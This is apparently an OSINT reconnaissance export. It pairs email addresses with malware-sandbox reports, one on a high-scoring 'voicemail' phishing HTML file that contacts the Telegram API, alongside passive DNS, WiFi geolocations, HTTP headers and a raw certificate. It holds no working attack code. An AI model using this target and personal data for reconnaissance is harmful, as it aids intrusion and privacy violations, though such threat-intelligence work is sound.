| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, 
u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image 
data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': 
u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 64.226.81.43 | kekw.battleb0t.xyz |
| 2023-05-12 02:53:32 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BSL (Net ID: 00:02:2D:39:EF:C9) | 37.7642, -122.3993 |
| 2023-05-12 03:10:00 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | ondigitalocean.com | netherlands-18708423.mongo.ondigitalocean.com |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fernando.r@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'Voicemail Message (Elodie Raven_ Fernando R ) From_(178-077-5401)_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:443"\n "185.199.110.153:443"\n "13.227.74.112:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5828:304:WilStaging_02"\n "Local\\SM0:5828:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:120:WilError_01"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8140:304:WilStaging_02"\n "Local\\SM0:8140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6188:304:WilStaging_02"\n "Local\\SM0:6188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"\n "zeptojs.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5828_1708721866\\product_page.js]- [targetUID: 00000000-00005828]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5828_946205218\\adblock_snippet.js]- [targetUID: 00000000-00005828]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5828_1708721866\\auto_open_controller.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5828_1708721866\\shoppingfre.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_confirmation_page_validator.js" - Location: 
[%TEMP%\\5828_1708721866\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005828]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005828]\n "Part-DE" has type "data"- Location: [%TEMP%\\5828_946205218\\Part-DE]- [targetUID: 00000000-00005828]\n "6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp]- [targetUID: 00000000-00006188]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005828]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE]- [targetUID: 00000000-00005828]\n "75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp]- [targetUID: 00000000-00005828]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00005828]\n "7de06ccc-e1f1-446e-9777-eeec16b06646.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7de06ccc-e1f1-446e-9777-eeec16b06646.tmp]- [targetUID: 00000000-00005828]\n "e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp]- [targetUID: 00000000-00005828]\n "d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp]- [targetUID: 00000000-00005828]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005828]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005828]\n "39d75e53-4923-4b9e-bc44-d169ef496172.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\39d75e53-4923-4b9e-bc44-d169ef496172.tmp]- [targetUID: 00000000-00005828]\n "72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp]- [targetUID: 00000000-00005828]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00005828]\n "8590c4d3-1805-4c87-83be-f642e5ed3447.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8590c4d3-1805-4c87-83be-f642e5ed3447.tmp]- [targetUID: 00000000-00005828]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\5828_1392880218\\_metadata\\verified_contents.json]- [targetUID: 00000000-00005828]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential 
IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-timer: S1683860053.299752,VS0,VE13 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^[^_^_^Y^I (Net ID: 00:02:2D:6F:81:A0) | 34.0544, -118.244 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b5dccec8f8690-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:44:28 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:55:50.449 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:63:FF:85:C1:92:6A:F0:48:97:56:
6A:A1:9A:CD:CD:96:31:BB:FB:75:C5:76:C0:D5:93:B6:
FA:22:8A:0A:B2:02:21:00:D0:25:C4:C4:9C:87:C7:8A:
D8:88:7C:0F:ED:E3:EE:A9:F5:8D:1E:8A:7D:57:63:8B:
34:EA:A9:AA:0E:B7:1F:86
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 16:55:50.476 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:54:A3:38:5D:40:4F:67:06:7D:10:18:A9:
8D:94:8F:5C:FA:96:C9:CD:18:CE:28:22:68:39:92:D0:
96:C8:FF:F6:02:20:1D:2D:AD:B7:86:08:EE:7E:EE:05:
FA:EC:70:98:F7:7B:A0:74:8A:7A:10:64:BF:3C:10:A9:
7A:16:EC:A7:CC:4B
Signature Algorithm: sha256WithRSAEncryption
20:7b:5f:2b:bd:28:eb:4d:bf:d7:77:bb:a0:1a:8f:df:78:60:
37:c8:a6:0a:7a:b4:17:f5:92:59:69:c6:b8:6a:7b:eb:7c:d1:
4d:b7:1f:8a:b6:a8:fe:6f:70:f7:71:12:28:35:3b:1d:c9:e2:
3e:5a:b9:ce:51:09:75:8e:66:10:ba:ac:7a:bf:80:93:80:59:
81:68:1a:f1:4b:74:5d:68:98:fd:b9:d6:3c:7d:27:77:0e:6b:
c3:83:68:c1:53:51:8c:92:a8:96:95:40:f7:6c:ab:93:47:5e:
